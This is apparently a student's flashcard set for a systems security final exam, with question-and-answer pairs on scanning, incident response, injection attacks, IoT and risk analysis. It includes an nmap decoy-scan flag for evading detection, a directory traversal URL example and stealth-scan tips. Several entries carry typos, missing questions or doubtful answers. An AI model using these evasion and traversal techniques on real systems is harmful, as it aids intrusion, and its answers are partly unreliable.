Systems Security II Final
Fill in the missing piece of the command: Nmap has the ability to generate decoys that make the detection of the actual scanning system become much more difficult. The nmap command to generate decoys is nmap ____ RND:10 target_IP_address
-D
Which of the following should be included in a policy? (Select two.)
-Definition of security incidents -Outline for roles and levels of authority
Which of the following are best practices to secure mobile devices for users?
-encrypt the device storage -set up remote wipe -don't auto-upload photos to social media
Which of the following BEST describes a disassembler program?
A program that translates machine code into assembly language, or low-level language.
When a host initiates a connection to a server via the TCP Protocol, a three-way handshake is used. What is the host's final reply?
ACK
Who maintains the Android source code?
AOSP
which type of processor chip is designed to perform a single function and is typically custom-designed?
ASIC
which type of wireless network does not use a wireless access point?
Ad-hoc
Why should DNS zone transfers be restricted or disabled?
An attacker can intercept the transfer and change information
Which of the following IoT security challenges can 2FA (two-factor authentication) help mitigate?
Authentication
Which of the following is a utility that hackers can use to locate vulnerable Bluetooth devices?
Bluesniff
Which web application scanner looks for common vulnerabilities, like cross-site scripting and SQL injections, and also scans for the OWASP Top 10?
Burp Suite
Which of the following is an entity that issues digital certificates?
CA
What do each of the letters represent in the CIA triad? (Select three.)
Confidentiality Integrity Availability
In 2016, an attacker used a botnet of security cameras, DVRs, and network printers to target a cloudbased internet performance management organization that provided DNS services to large corporations. This created connectivity issues for legitimate users across the United States and Europe. Which type of attack was MOST likely used in this scenario?
DDoS attack
Which of the following IoT attacks involves using IoT devices as a zombie army to target a server or system?
DDoS attack
You train your staff to notify you if they notice any of the following signs: -Services are unavailable or very slow -Unexpected 503 error messages -Abnormal spikes in network traffic -Customer complaints about access Which type of attack are you preparing against?
DDoS attacks
Which of the following is an email authentication tool that relies on an email's encrypted digital signature to verify its authenticity?
DKIM
Which of the following tools allows domain owners to notify receivers that emails have been authenticated, provides feedback about the legitimacy of emails sent on their domain, and applies instructions for emails that failed authentication?
DMARC
During the reconnaissance phase, an attacker is looking for common attack vectors. Which of the following services is MOST likely to be targeted?
DNS
Which of the following firewall evasion techniques is used to redirect a user to a malicious website?
DNS poisoning
Which of the following should be implemented as protection against malware attacks?
DNS sinkhole
Which of the following would an external assessment check?
DNS zones
Where can you find a quick overview of your monitored system's current state?
Dashboard
Which EAP protocol provides authentication using a protected access credential?
EAP-FAST
A hacker wants to leverage social media to glean information coming from a certain location. Which tool is BEST suited for the job?
Echosec
Which site MOST often shows the newest vulnerabilities before other sources?
Full Disclosure
Which of the following is a device used by the blue team to lure an unsuspecting attacker to aimlessly explore?
Honeypot
Which of the following BEST describes system logs?
Indicate logins with escalated privileges.
Troy, a security analyst, is tasked with reviewing company websites to see which type of information is being shared. Which sharing policy BEST describes this topic?
Internet
Which of the following BEST describes the isolation-based containment method?
Involves disconnecting a device, VLAN, or network segment from the rest of the network
A security analyst discovers that a system has been compromised through the building's thermostat. Which type of attack is this compromise from?
IoT trojan
What is the FIRST step in vulnerability scanning penetration?
Locate the live nodes in the network. You can do this using a variety of techniques, but you must know where each live host is.
Which Bluetooth security mode uses Diffie-Hellman techniques for key exchange and generation?
Mode 4
Which of the following is used to define minimum security requirements a device must meet before it can connect to a network?
NAC
A security analyst needs an infrastructure vulnerability scanner that's flexible enough for low- and high-level protocols, is updated daily with new vulnerabilities, and allows for performance tuning. The company is on a tight budget, so it needs to be open source. Which tool is the BEST option?
OpenVAS
Important aspects of physical security include which of the following?
Preventing interruptions of computer services caused by problems such as fire
Which of the following needs to be configured so a firewall knows which traffic to allow or block?
Rules
which of the following cyberattacks involves an attacker inserting their own code through a dtaa entry point created for regular users in such a way that the server accepts the malicious code as legitimate?
SQL injection
Which of the following allows users to sign into a single trusted account, such as Google or Facebook?
SSO (single sign-on)
Which of the following is a fixed-sized bit array that has random data added to each plaintext hash?
Salted hashesP>
You have just finished creating several network polices using the Network Policy Server (NPS) as shown in the image. Vera belongs to the Sales, Marketing, and Research groups. What kind of access will Vera have?
She will be granted access because she belongs to the Sales group, and that group is evaluated first.
Which of the following is the BEST search engine for IoT devices?
Shodan
SNMP uses agents communicate with network devices via which of the following?
The public community provides read-only access to device configuration.
Which method does degaussing use to securely dispose of data?
The use of a powerful magnetic force to wipe data completely from a drive.
What is the main purpose of SOAR?
To replace tasks that are repetitive and done manually with automated workflows
Which program did the U.S. Department of Defense set up to determine the authenticity of a hardware source?
Trusted Foundry Program
Which of the following can be run as traditional software on a virtual machine?
VFA
You have just run the nmap command shown below. Which vulnerabilities were found on the target firewall?
VPN
You are in the process of configuring pfSense Snort as your intrusion detection and prevention system (IDS/IPS). You have configured the options shown in the image, but when you try to save your changes, pfSense won't let you continue. What did you forget to configure?
a Snort Oinkmaster Code was not entered
Which threat modeling measurement is used to describe how an attack can exploit a vulnerability?
attack vector
Which of the following is the science of gathering and analyzing digital data in relation to a computer crime or cyber attack?
digital forensics
Which of the following is a popular honeypot that can be used to create thousands of other honeypots?
honeyd
which of the following is a device used by the blue team to lure an unsuspecting attacker to aimlessly explore?
honeypot
A(n) ______ threat comes from a disgruntled employee or contractor.
internal
Cisco devices have a special interface called _____, which is designed to act as a blackhole.
null0
Which scanning tool uses ICMP protocol?
ping
A security analyst is concerned about flaws in the operating system being used within their company. What should their FIRST step be to remedy this?
regular system patches
Which of the following mobile device attacks targets vulnerabilities in a device's S@T browser?
simjacker
When you create an event subscription, events are sent from one computer to another. What is the computer that generated the event called?
source computer
What is the name for a mock attack exercise that simulates an actual network attack?
tabletop
Costs that are easily identifiable and quantifiable, such as damaged hardware, stolen passwords, and lost or corrupted data, are considered which type of impact?
tangible
Which of the following roles is often outsourced in risk training scenarios?
the offensive team
What does the HTTP response message 5xx indicate?
the server did not complete the request
How is probability determined using quantitative analysis?
using the ARO calculation
Which method involves considering all an incident's details and taking action to keep the incident from happening again.
vulnerability mitigation
When performing active reconnaissance, a malicious actor may try to do which of the following?
work at peak hours to blend in
Which of the following BEST describes the role of a remediation server?
works to bring devices up to a minimum security level
After having calculated the MD5 hash for a file, you need to compare it to the value provided by the vendor. You could examine each character to ensure it is correct, but PowerShell has a utility for comparing the strings. Which of the following would be an example of that command?
"2b8efe1bee907243f22c16e14032a5ea" -eq "2b8efe1bee907243f22c16e14032a5ea"
Fred runs a small manufacturing shop. He produces consumer goods on his equipment. Suppose Fred has six stamp presses each valued at $35,000. At any given time, two of his presses might be out of service due to mechanical breakdowns or required upgrades. What is Fred's single loss expectancy?
$70,000
A new openSSH vulnerability has been discovered. You are tasked with finding all systems running an SSH service on the network. The nmap 192.168.122.0/24 command has been run to find all potentially vulnerable systems, and the output is shown below. Which machines on the following IP addresses will likely need their SSH software updated immediately? (Select two.)
-192.168.122..82 -192.168.122.1
When decommissioning assets, which of the following MUST be recycled?
-CRT monitors -notebook batteries
You are looking for a wipe utility to erase deleted files without affecting any other files. Which utilities could you use? (Select two.)
-DP shredder -Cipher
Which of the following methods for making data inaccessible is considered insufficient for preventing data recovery? (Select two.)
-Formatting all partitions. -Deleting or changing all partitions on the device.
A company has a list of high-value assets (HVAs). As a security analyst, what must you do to help protect those assets? (Select two.)
-Make sure an incident involving one of the HVAs is always high priority. -Make sure the response team can easily identify the HVAs.
What information is included in the service portion of a due diligence assessment? (Select two.)
-What level of system access does the vendor require? -Does the vendor provide reliable and timely product support?
Over time, changes in the way people use networks have complicated protecting a network against security threats. Which of the following trends has increased the need for security? (Select two.)
-cloud computing -social networking
Which of the following configurations can be used with Windows Event Forwarding? (Select two.)
-collector-initiated subscriptions -source-initiated subscriptions
You are tasked with updating the company policy for tablets and phones to make them harder to penetrate if they fall into the wrong hands. Which of the following would be good practices to consider? (Select two.)
-ensure simple passcode is turned off -make passcode or passwords mandatory after a short period of time
Which items are included in an acceptable use policy? (Select two.)
-how information and network resources should be used -expectations for user privacy when using company resources
Which items should be included in data retention standards? (Select two.)
-how long to store data -how data should be destroyed
When determining a risk's severity, which of the following are best to consider? (Select two.)
-magnitude -probability
When performing an authorized security audit of a website, you are given only the website address and asked to find other hosts on that network that might be vulnerable to attack. Which of the following tools might be used to lead you to the following Nmap output? (Select two.)
-whois.org -nslookup
Which file on a Linux system can be enumerated to display all known users?
/etc/passwrd
Which of the following BEST describes a non-disclosure agreement policy?
A policy requiring a confidentiality contract in which employees agree to not divulge certain information for a specific length of time.
Which of the following BEST describes the data security policy of data sovereignty?
A policy that dictates that data is subject to the laws of the nation in which it was collected.
Vulnerability scanning has its limitations. Which answer BEST describes the concept of point in time?
A scan can only obtain data for the period of time that it runs.
Which BEST defines the term base in CVSS?
A vulnerability's unique characteristics
Robyn, a new employee, needs to choose a password to log into the system. She doesn't want to forget it, but she needs to meet certain criteria required by security. What should she do?
Choose a password that's easy to remember but doesn't include any personal information.
secure remote administration and connectivity testing. perform extensive input validation. configure the firewall to deny ICMP traffic. Stop data processed by the attacker from being executed.
DoS Attack
disable the directory listing option and remove the ability to load non-web files from a URL.
File and directory management
which of the following should be designed to look and function like a real resource in order to attract attackers?
Honeypot
What is the name of a computer on which a hypervisor runs to provide one or more virtual machines?
Host
What should you do with email from unknown or unverified user accounts?
Ignore the email
perform input validation. Do not permit dangerous characters in the input.
Injection Attack
Which of the following BEST describes continuous intergration?
It allows all integration changes to be automated and placed back into a shared mainline.
Why is security for VMs more important than security for a physical machine?
One bad configuration could be replicated across your network.
Which cloud service model would MOST likely be used by a software developer?
PaaS
Shelley, a programmer, wants to make sure her code works well under rigorous conditions. Which of the following activities would be MOST appropriate to help her run a stress test on her code?
Put an enormous amount of data into the software to see if it has problems
Mary is working on a software development project, and her manager reminds her that the team needs to focus on software assurance. Which of the following BEST describes software assurance?
To create software that customers find reliable
Which of the following BEST describes a network policy?
a set of conditions, constraints, and settings used to authorize which remote users and computers can or cannot connect to a network.
Which of the following BEST describes a high-value asset?
an offline asset that halts production
At which layer is a web application firewall log used to record HTTP traffic?
application
Which of the following SQL injection attack types uses true/false questions to perform reconnaissance?
blind injection attacks
Which of the following is a type of malware that can be purchased in a ready-to-use state, is created to be used with a variety of targets, can be integrated with other malware programs, and can be implemented in stages?
commodity malware
Which resource can BEST be described as a site that combines diverse ideas and perspectives from professionals, academics, and government sources?
common weakness enumeration
Which cloud deployment model would MOST likely be used by several organizations that share the same regulatory requirements?
community cloud
What should be the FIRST reconnaissance countermeasure taken?
create information sharing policies
What is vandalism?
damaging or defacing assets
Which IoT communication model would MOST likely be used by a thermostat?
device-to-device model
Which of the following attacks would use the following syntax? http://www.testout.com.br/../../../../ some_dir/ some_file
directory traversal
update web servers with security patches on a regular basis. limit access to the secure areas of the website
directory traversal
Which technology causes a transistor in the chip to blow if the chip's firmware is altered?
eFuse
Which of the following validations require an extensive verification process, shows a padlock, business name, and country code?
extended
Downtime, penalties, and damage to assets are incident consequences with which type of impact?
immediate impact
Which of the following BEST describes a physical barrier used to deter an aggressive intruder?
large flowerpots
Which of the following containment methods divides the network into subnetworks that are unable to communicate with each other directly?
segmentation
Restarts, crashes, frozen applications, and intermittent stopping are examples of which applicationbased indicator of compromise (IOC)?
service interruption
The following steps describe the process for which type of attack? 1. Locate and sniff an active connection between a host and web server. 2. Monitor traffic to either capture or calculate the session ID. 3. Desynchronize the session. 4. Remove the authenticated user. 5. Inject packets to the server.
session hijacking
You are working with ACLs on your Windows machine and have created some complex permissions with many users and groups defined. Now you want to back up those permissions so that they can be restored in the event of a system failure. What is missing from the below command?
there has been no file name specified
In what order are rules in an ACL processed?
top to bottom
Damage to an organization's reputation and other non-cost incident consequences are considered which type of impact?
total impact
An organization's cybersecurity staff needs to be competent at their jobs or serious consequences can occur. Which of the following is an important component to staying up to date and honing a team's cybersecurity skills?
training
Your boss has requested that you ensure that the chips in all new hardware purchases have not already been infected with malware or other malicious software. Which feature should you look for in your devices?
trusted platform module
Which IPsec method is the most used and protects an entire packet by wrapping it with a new IP header, encrypting it, and then sending it on to the receiving host?
tunnel mode
Which of the following are characteristics of a RESTful API? (Select two.)
-A layered system that organizes server types. -A client-server architecture managed through HTTP
While performing a password audit on a Windows machine in your organization with L0phtCrack, you receive the following results. Based on what you see below, which two accounts should worry you the most? (Select two.)
-Administrator -Mihai
Which of the following Kali Linux utilities can be used to find Bluetooth devices? (Select two.)
-Bluelog -Blueranger
Which of the following indicate the email highlighted below may be suspicious? (Select two.)
-The link in the email is to an IP address; it is not to Microsoft's website. -There are several spelling mistakes in the email.
Which of the following are true about threats and vulnerabilities? (Select two.)
-a threat is a potential source of harm -a vulnerability is an opening for an attacker to exploit
Which of the following are true regarding parameterized queries? (Select two.)
-are pre-compiled SQL statements -help prevent SQL injection attacks
Which of the following two methods can be used to refine the number of alerts displayed in Kibana based on search rules? (Select two.)
-click ring on the security onion - data overview graph -add a filter in the search field
The economic impact of an incident can be tangible or intangible. Which of the following costs would be considered intangible? (Select two.)
-damage to reputation -loss of potential customers
Which of the following firewall evasion countermeasures should be implemented to mitigate firewall evasion? (Select two.)
-defense in depth -filtering an intruder's IP address
Which of the following are considered DNS hardening techniques?
-optimize resources to their full potential -learn about your web server software -clean up out of date zones
Some Remote Access Trojans (RATs) install a web server to allow access to the infected machine. Others use a custom application that is run on the remote machine, such as ProRAT. Once infected with this custom application, which other types of infections are possible with this tool installed? (Select two.)
-ransomware -rootkit
An impact analysis evaluates the cost of an attack. Which of the following would be considered a non-financial cost?
-reputation -customer satisfaction
Natural disasters can happen at any time and have unknown or incalculable effects. Based on information from subject matter experts, the probability of a natural disaster is once every 75 years. Using this information, what is the annualized rate of occurrence (ARO) for a natural disaster affecting an organization?
0.013
which frequency does ZigBee operate at?
2.4 GHz
Attackers have used a brute force attack to crack CHF hashes in your network. What could you do to better protect the original strings?
Apply adaptive hashing.
Which of the following is a dictionary of known patterns of cyberattacks used by hackers?
CAPEC
Which of the following tools is best for ensuring that users have access to only the applications and resources they need in a private cloud?
CASB
log off immediately after using a web application. Clear history after using a web application, and don't allow your browser to save your login details.
CSRF Attack
Which vulnerability scoring system uses metrics called base, temporal, and environmental?
CVSS calculator
A user has reported that they can't remote into the OpenSSH service running on their Windows 10 machine that they use to transfer files from a development Linux box. You are at the Windows machine and have Task Manager running. You notice that the SSHD, the OpenSSH server process, is not in the list on the Processes tab of Task Manager. Which tab on the screenshot below would you click on, and which steps could you take to start the service and ensure it starts every time the machine is booted?
Click on the Services tab and then click Open Services at the bottom. Then find the OpenSSH SSH Server entry, double-click on it, and click the Start button. Change the Startup Type field to Automatic.
During which phase of the incident response life cycle do you isolate affected systems and restrict communication to only trusted individuals?
Containment
A security analyst must identify risks and figure out how best to mitigate them. Which of the following are risk mitigation techniques? (Select three.)
-train users to identify email attacks -close unused ports on a firewall -ensure systems are patched and updated
Which of the following are benefits of a BYOD policy? (Select three.)
-work flexibility -increased productivity -lower costs
Troy, a security analyst, needs a web application scanner that is extensible and that evaluates each web application individually. Which tool is BEST for his needs?
OWASP ZAP
Allen's company has raised concerns about network information that can be observed without a hacker being discovered. Which of the following BEST describes the type of assessment that could be used to operate in this manner?
passive
When analyzing memory consumption for indicators of compromise, what information is the most useful?
per-process memory usage
PII, if exposed or captured by attackers, can be used to exploit and blackmail. What is PII?
personally identifiable information
Including a legitimate-looking embedded link to a malicious site in an email purporting to be from a legitimate source is which of the following types of cyberattack?
phishing
Which of the following mobile data acquisition types copies the entire flash memory, including deleted files and data remnants?
physical acquisition
Which information type is a hacker working with when they gather geographical information, entry control points, and employee routines?
physical security
You are tasked with changing the certificate authority to require that all requests be placed in the pending state until processed by an administrator. You have started certsrv (the certificate authority console) and are looking at the certificate authority's properties. Which tab would you select to change the way certificate requests are handled?
policy module
Which of the following BEST describes the process of verifying that a device meets the minimum health requirements?
posture assessment
During which phase of the incident response life cycle do you reinforce your systems, policies, and procedures to ensure that your resources are well secured?
preparation
Which of the following is one of the five phases of the incident response life cycle?
preparation
in actively defending against SQL injection attacks, you create queries that have placeholders for values from your user's input. Which of the following SQL injection countermeasures did you implement with these queries?
prepared statements
COBIT, ITIL, and ISO are examples of which type of framework?
prescriptive
Which type of framework is fairly rigid and requires that specific controls be implemented?
prescriptive
You have performed a SQL injection attack against a website using Burp Suite and see the following results. What are you looking for?
any results that show something unexpected being passed back from the server
Which security control layer involves putting in place policies that comply with industry standards, such as OWASP?
application
which of the following uses the TCP/IP stack and is effectively employed to slow down the spread of worms, backdoors, and similar malware?
layer 4 tarpit
Your company has just completed social engineering training for all employees. To test the training's effectiveness, you have been tasked with creating a simple computer virus that creates a file on a user's desktop. Approximately how long will you need to create the virus?
less than one day
Post-incident activities provide an opportunity to learn from experiences. The feedback gathered in this phase can be used to improve on existing security policies and procedures. A good way to gather this information is to hold a meeting to discuss the incident and the incident response. What is this meeting called?
lessons learned
Which of the following is a good way to prevent privilege escalation attacks?
limit privileges
You are testing for password vulnerability and used the command below to probe a Linux machine on your network. You then received the output below in return. Prior to the test, you scanned the IP to ensure that the SSH port was open. Now when you scan the same IP from a different machine, you see it's still open and that SSH connections are accepted from other IP addresses. Which of the following would MOST likely explain what has happened?
The target server is using Fail2Ban and has started refusing connections from the source IP address
Which of the following BEST describes signing in without single sign-on?
The website must have its own database of user credentials.
Which of the following BEST describes signing in with single sign-on?
The website's authentication server verifies the credentials.
During a tabletop exercise, someone from the red team has a question about a procedure's validity and whether or not it would violate the terms of engagement. How should this be determined?
The white team must answer the question before moving forward.
While using Wireshark for some network traffic analysis, you filter for DHCP traffic and see the following information. What conclusion can you make?
There are two DHCP servers answering requests
Which of the following BEST describes steps in an active defense against DDoS attacks?
Train staff for warning signs, allow only necessary outside access to servers, and configure network devices' preexisting mitigation settings, like router throttling.
Which of the following is the practice of gathering insight about network events based on users daily behaviors to create a baseline for anomaly detection?
UEBA
Run all processes using the least privileged account. Use secure web permissions and access control mechanisms.
Unused user accounts and services
You have implemented a regular backup schedule for a Windows system, backing up data files every night and creating a system image backup once per week. For security reasons, your company has decided not to store a redundant copy of the backup media at an off-site location. Which of the following would be the best backup and storage option?
Use incremental backups and store them in a locked, fireproof safe.
What information can an organization obtain as part of a SCAP security scan?
Whether or not their systems are configured for optimal security
An attacker needs the following information about his target: domain ownership, domain names, IP addresses, and server types. Which tool is BEST matched for this operation?
Whois
A security analyst is working to discover zero-day attacks before the system is compromised. What is one method for discovering these types of attacks that the security analyst should try?
Write rules in a program like YARA that recognizes similar patterns of code found in other malware and flags them if they interact with the system.
Which of the following attacks exploit vulnerabilities in the web application and allows the attacker to compromise a user's interactions with the app?
XSS
Use rigid specifications to validate all headers, cookie query strings, hidden fields, and form fields.
XSS attack
Which type of scan turns on an abundance of flags, causing the packet to be lit up?
Xmas tree scan
You are monitoring your network's traffic, looking for signs of strange activity. After looking at the logs, you see that there was a recent spike in database read volume. Could this be a problem and why?
Yes. A spike in database read volume can show that a hacker has downloaded a great deal of information from the database.
You are testing a new application using a combination of known and unknown testing. How would you BEST describe this approach?
You are engaging in partially known testing.
How can the Wireshark tool help you with digital forensics?
You can use it to analyze packets to search for evidence.
A password spraying attack is MOST like which of the following attack types?
a brute force attack
Members of the executive team have asked for an explanation as to why the bit size of an encryption key needs to be higher than the 56-bit RC4 they are using. They show you a screenshot of the research they've done on the powerful desktop computer they run, saying that none of the keys they are using will be in production for more than a year. They want to just keep using the smaller keys. How would you answer them?
a cluster or use of cloud computing could break this in a very short period of time
The DKIM tool can provide security for your company's emails because it contains which of the following?
a digital signature
Which of the following BEST describes Central Policy?
a program that checks for the correct attributes in an attribute-based system
Which of the following BEST describes a relational database?
a storage bank for data that is organized in tables linked by keys and which can be searched in multiple ways through those keys
Which of the following BEST describes a rainbow table?
a table of passwords and the computed matching hashes
What does a router use to protect a network from attacks and to control which types of communications are allowed on a network?
access control list
during which phase of the kill chain framework does an intruder extract or destroy data?
action on objectives
Which cybersecurity approach seeks to asymmetrically put the odds in the security analyst's favor by using maneuverability of sensitive data, honeypots, and anti-malware programs?
active defense approach
An attacker has made their way into an organization's network and run an LDAP enumeration tool. What is the attacker MOST likely accessing and extracting information from?
active directory
Jason, an attacker, has manipulated a client's connection to disconnect the real client and allow the server to think that he is the authenticated user. Which of the following describes what Jason has done?
active hijacking
Charles, a security analyst, needs to check his network for vulnerabilities. He wants a scan that interacts with network nodes and repairs security issues found. Which kind of scanning BEST describes Charles' requirements?
active scanning
Which set of tools is often used to intercept the four-way handshake?
aircrack-ng
A company is considering the purchase of a new application. During the evaluation period, a security analyst wants to make sure that all areas of the app are secure, especially input controls. Which assessment BEST meets these requirements?
application-level assessment
John's company just purchased a new application for which they do not have the source code. Which of the following BEST describes the type of assessment John should use on this application?
application-level assessment
Which IoT security category does disabling guest or demo accounts fall under?
authentication
Which of the following types of devices use sensors to gather data and send that data back to specialized controllers to make decisions and changes in the systems?
automated systems
An organization's user data server is backed up daily. Referencing the CIA triad, this is an example of which of the following?
availability
The third step in vulnerability management is to see what an organization looks like from an outsider's and insider's point of view. Which step in life cycle management does this apply to?
baseline creation
You have just installed Nessus for auditing a network segment. Which of the following Nessus scans would be BEST suited for an initial query of hosts on a network segment?
basic network scan
Which of the following could you use as an LDAP countermeasure?
block port 389
A security analyst and their team go through the entire list of assets in the company and assign each item a level of priority. Then they group the assets in the same levels together so they can create defense strategies for each group. What is this process called?
bundling critical access
Which method is used to verify that a connected device is trusted?
bus encryption
How is probability determined using qualitative analysis?
by a team of subject matter experts
Which web application architecture layer includes the physical devices that are used to access the web application?
client/presentation
When you create an event subscription, events are sent from one computer to another. What is the computer that receives the events called?
collector computer
Creating a baseline is vital to managing vulnerabilities. What is the FIRST step in creating this baseline?
conduct a pre-assessment
There is a feature that has the following characteristics: -Is deterministic. -Can quickly compute the fixed-sized bit array for any given input. -Creates a unique fixed-sized bit array for each input. -Creates a new array if any modification occurs to the original input. These characteristics BEST describe which of the following?
cryptographic hash function
Large data transfers to unusual devices could be a sign of which Indicator of Compromise (IOC)?
data exfiltration
Which type of breach happens when an attacker removes or transfers data from your system to another?
data exfiltration
You have observed that Steve, an employee at your company, has been coming in at odd hours, requesting sensitive data that is unrelated to his position, and bringing in his own flash drive. Steve's actions are common indicators of which of the following threats?
data loss
Which of the following is the process of obfuscating data by changing it into random characters?
data masking
A new piece of equipment is placed into production. It is connected and powered on. Which of the following is the known threat vulnerability introduced in this scenario?
default credentials
As a security analyst working for an accounting firm, you need to evaluate the current environment. Which of the following is the FIRST thing you should do?
define the effectiveness of the current security policies and procedures
Which of the following permissions would take precedence over the others?
deny read
Which government agency sponsors five valuable resources for security analysts?
department of homeland security
Mary, a security analyst, is tasked with vulnerability research as part of her company's vulnerability assessment. She discovered that their website is vulnerable to cross-site scripting. Which vulnerability type BEST describes what Mary has found?
design flaw
which type of security control identifies logs, and reports incidents as they happen?
detective
Which security control makes a system more difficult to attack?
deterrent
Ron, a hacker, wants to gain access to a prestigious law firm he has been watching for a while. June, an administrative assistant at the law firm, is having lunch at the food court around the corner from her office. Ron notices that June has a picture of a dog on her phone. He casually walks by and starts a conversation about dogs. Which phase of the social engineering process is Ron in?
development phase
Which of the following certification types has the lowest level of certificate assurance?
domain
Before signing an agreement with a new vendor, which type of assessment should you complete?
due diligence
Compliments, misinformation, feigning ignorance, and being a good listener are tactics of which social engineering technique?
elicitation
Which of the following is an advantage of setting up a federation?
employees have easier onboarding
you are in the process of configuring pfSense Snort as your intrusion detection and prevention system (IDS/IPS). You want to ensure that it includes the anti-malware IDS/IPS rule set taht enables users with cost constraints to enhance their existing network- based malware detection Select the option that would add these rule sets.
enable ET open
You have been hired by an organization that has been victimized by session hijacking. What is one of the most important steps you as a security analyst can take to prevent further session hijacking attacks?
encrypt network traffic
Which of the following is an example of IAM?
entering a PIN
The receptionist receives a call from a customer who asks for the customer support manager's name and email address to send them a thank you email. How should the receptionist proceed?
forward the call to the help desk
Which of the following IoT components acts as a bridge between a device and the cloud?
gateway system
A hacker wants to check if a port is open using TCP Protocol. The hacker wants to be stealthy and not generate any security logs. Which type of port scan is BEST suited for this endeavor?
half-open scan
Trusted Platform Modules and Hardware Security Modules are two examples of which hardware assurance?
hardware roots of trust
Which of the following NAC policies is MOST commonly implemented?
health
What is a likely motivation for DoS and DDoS attacks?
injury of the target's reputation
Why does splitting DNS into internal and external groups make sense.
it provides an added layer of security
Which security control category controls system oversight?
managerial
Which of the following is the last phase of the vulnerability management life cycle?
monitoring
Which of the following are tactics social engineers might use?
moral obligation, ignorance, and threatening
Where should VM administration occur?
on the hypervisor and virtual machine
Where are network device log files stored by default?
on the local device
Which devices are responsible for forwarding packets in a virtual network?
physical networking devices
Which command was invoked to start PID 3825 in the output below in conjunction with the ps aux command?
python
A(n) ______ assessment measures valuation and intangibles.
qualitative
Any attack involving human interaction of some kind is referred to as which of the following?
social engineering
Which of the following attack types overflows the server, causing it to not function properly?
DoS
A speaker was invited to a company-wide training meeting. When he arrived, he identified himself at the front desk, and the receptionist gave him directions on how to find the conference room. What important step did the receptionist miss?
Escorting him to the conference room
which processor chip can be configured by the end user to perform the tasks he or she needs it to?
FPGA
Which of the following works together by calling on each other, passing data to each other, and returning values in a program?
Function
a security analyst is testing to find SQL injection vulnerabilities. She uses automation of a large volume of random data inserted into the web application's input fields in order to check the output. Which type of testing was done?
Fuzz testing
Which protocol does Windows Event Forwarding use to transfer events to a central computer?
HTTP
Which of the following attack types takes advantage of user input fields on a website?
HTTP response splitting
remove user input fields when possible.
HTTP response splitting attacks
A company is in the process of hiring Jill, a new technician. HR has checked the background and references of the candidate. What are some next steps in the hiring process that HR should take?
Have her sign an NDA and AUPs.
Jake, a security analyst, has been asked to examine the malware found on the company's network. He decides the best place to start is to use a tool to translate the executable files to assembly language so he can understand what the malware can do and what it can impact. Which tool is the BEST choice for Jake to use?
IDA pro
Which of the following statements is true regarding IDS and IPS?
IDS is a passive system; IPS is an active system
Pedro, a security analyst, is tasked with monitoring a company's threat feed. Which of the following should he look for as part of his analysis?
IP addresses that might be malicious.
One common setting on electronic tablets is a feature that erases all data if the password or passcode is entered incorrectly too many times. This can be a very good thing for corporate devices or devices that contain company data. What is a logical reason that this setting could be a bad idea in certain situations?
If a user doesn't know about the policy, is inattentive, or a child gets the device and enters the passcode incorrectly, important data could be lost.
Which of the following is true regarding containerization?
If an attacker gains access to the operating system, they will have access to all containers.
John, a security analyst, conducted a review of a company's website. He discovered that sensitive company information was publicly available. Which of the following information sharing policies did he discover was being violated?
Internet
Which network-based Indicator of Compromise (IOC) could be present if you detect ongoing communication between two workstations on your network?
Irregular peer-to-peer communication
An attacker has, through reconnaissance, discovered the MAC address to Sam Black's computer. Sam is a user in your network with admin privileges. The attacker uses a software tool that allows him or her to mimic Sam's MAC address and use it to access your network. Which type of attack has the attacker performed?
MAC spoofing
Mary has discovered that someone hacked in and stole personal files from her Google Drive. Which type of attack was MOST likely carried out against her?
MITC
You are creating an input validation component for a digital form. Which type of protection should you be building into it?
Make sure that no one can input something malicious into the form.
Which tool is used as a framework for exploiting vulnerabilities and conducting discovery using predefined scripts?
Metaslpoit
Which of the following tools would you use to perform a SYN flood attack?
Metasploit
A security analyst was alerted in real time that there is unusual incoming traffic on the network. The traffic was not and could not be prevented or altered by the program. Which type of program MOST likely sent the alert to the security analyst?
NIDS
Which of the following Windows permissions apply to local files and directories?
NTFS
Kjell wants a network scanning tool that gives remediation solutions to found vulnerabilities. He also wants to be able to create customized scan jobs that run during off hours and can scan multiple network technologies. Which application is BEST for him?
Nessus
Troy, a security analyst, is looking for a vulnerability scanning tool for internal use. His boss has told him to find the industry standard tool. Which tool BEST fits his mandate?
Nessus
John, a security analyst, needs a network mapping tool that will diagram network configurations. Which of the following BEST fits this category?
NetAuditor
A mailing list that often has the newest vulnerabilities listed before they show up on governmentsponsored resources is operated by whom?
Nmap
You are the security technician for your organization. You need to perform diagnostics on a vehicle's subsystems for security purposes. Which of the following would you use to access the vehicle's subsystems?
ODB-II
Which of the following BEST describes the type of network Bluetooth devices create?
PAN
Which of the following HTTP request/response types is used to request that the web server send data using HTML forms?
POST
During pairing, what is exchanged between two devices to confirm the correct devices are being paired?
Passkey
Which of the following BEST describes what asset criticality does?
Prioritizes systems for scanning and remediation.
which of the following is used to monitor and control PLC systems?
SCADA
Mary has been receiving text messages that contain links to malicious websites. Which type of attack is Mary a victim of?
SMiShing
Taylor is a manager who is trying to find a way to get computers with different operating systems to easily interact with each other. Which of the following should she use to accomplish this?
SOAP
Which of the following tools allows a domain owner to specify email servers that can send an email in the domain, and which servers are not allowed to send emails?
SPF
The field in the image below is supposed to return just the username associated with the user ID (a number). The output in the image, however, includes more information, including the username running the database. What is being exploited here?
SQL injection
Which of the following types of attacks involves constructing malicious commands with the goal of modifying a database?
SQL injection
You are looking for a vulnerability assessment tool that detects vulnerabilities on mobile devices and gives you a report containing a total risk score, a summary of revealed vulnerabilities, and remediation suggestions. Which of the following vulnerability assessment tools should you use?
SecurityMetrics mobile
Which of the following is a SIEM collection tool that's used to search and analyze large collections of data in multiple formats?
Splunk
Which of the following BEST describes a federation?
Stores a user's credentials so that trusted third parties can authenticate using those credentials without actually seeing them.
After creating a new case in Autopsy and selecting an image from a hard drive to inspect, you select the appropriate ingest modules, and the analyze process is completed. What should you look at next?
The Results section, which gives an overview of the process.
While reviewing a machine that a user has reported for strange behavior, you decide to use ipconfig to review its network configuration. Afterward, you see the output shown below. No changes were made manually to the machine's network configuration and all IP configuration is automatic. The proper default gateway for this network segment is 10.10.10.1. Which of the following would explain the output shown?
The machine in question is being targeted by a DHCP on-path (man-inthe-middle) attack.
Which of the following BEST describes scan information?
The name of the scanning tool, its version, and the network ports that have been scanned.
Which Linux command can be used to provide a table of each running process?
top
Which of the following is beta testing also known as?
user acceptance testing
Which of the following Linux permissions allows files to be added or deleted from a directory?
write
A list of actions and objectives taken to mitigate risk is known as a:
framework
It's a good idea to disable SNMP when not in use to prevent a possible attack. What is SNMP used for?
it's used for device management and reporting
